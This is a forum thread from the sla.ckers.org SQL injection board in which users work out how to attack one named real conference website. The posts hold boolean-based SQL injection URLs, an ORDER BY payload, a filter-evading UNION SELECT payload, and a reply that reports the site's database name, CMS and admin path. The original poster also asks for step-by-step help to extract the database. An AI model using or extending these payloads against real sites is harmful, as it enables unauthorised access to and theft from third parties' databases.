Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
how to inject when "order by" cann't be used?
Posted by: annen
Date: June 04, 2012 02:55AM

http://www.eera-ecer.de/index.php?cHash=276ee7bb415ca2b6042f87cace6aa3e3&id=421&no_cache=1&Action=showContributionDetail&conferenceUid=1&contributionUid=1047' and '1'='1-- ture
http://www.eera-ecer.de/index.php?cHash=276ee7bb415ca2b6042f87cace6aa3e3&id=421&no_cache=1&Action=showContributionDetail&conferenceUid=1&contributionUid=1047' and '1'='2-- error

http://www.eera-ecer.de/index.php?cHash=276ee7bb415ca2b6042f87cace6aa3e3&id=421&no_cache=1&Action=showContributionDetail&conferenceUid=1&contributionUid=1047' order by '111111111-- always ture!

Options: ReplyQuote
Re: how to inject when "order by" cann't be used?
Posted by: blackrose
Date: June 04, 2012 04:00PM

use
id=1' order by 100 +--+/

Options: ReplyQuote
Re: how to inject when "order by" cann't be used?
Posted by: RonPaul
Date: June 04, 2012 06:36PM

blind works
db = t3_eera
runns typo3
http://www.eera-ecer.de/typo3/index.php

Options: ReplyQuote
Re: how to inject when "order by" cann't be used?
Posted by: annen
Date: June 04, 2012 11:21PM

Thanks! Can you tell me how to inject this SQLi step by step?
I'm sorry that I could get the database_name.

http://www.eera-ecer.de/index.php?cHash=276ee7bb415ca2b6042f87cace6aa3e3&id=421&no_cache=1&Action=showContributionDetail&conferenceUid=1&contributionUid=9999.99' /*!UNioN*/ All /*!SelECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 aNd 'a'='a +--+/

Options: ReplyQuote


Sorry, only registered users may post in this forum.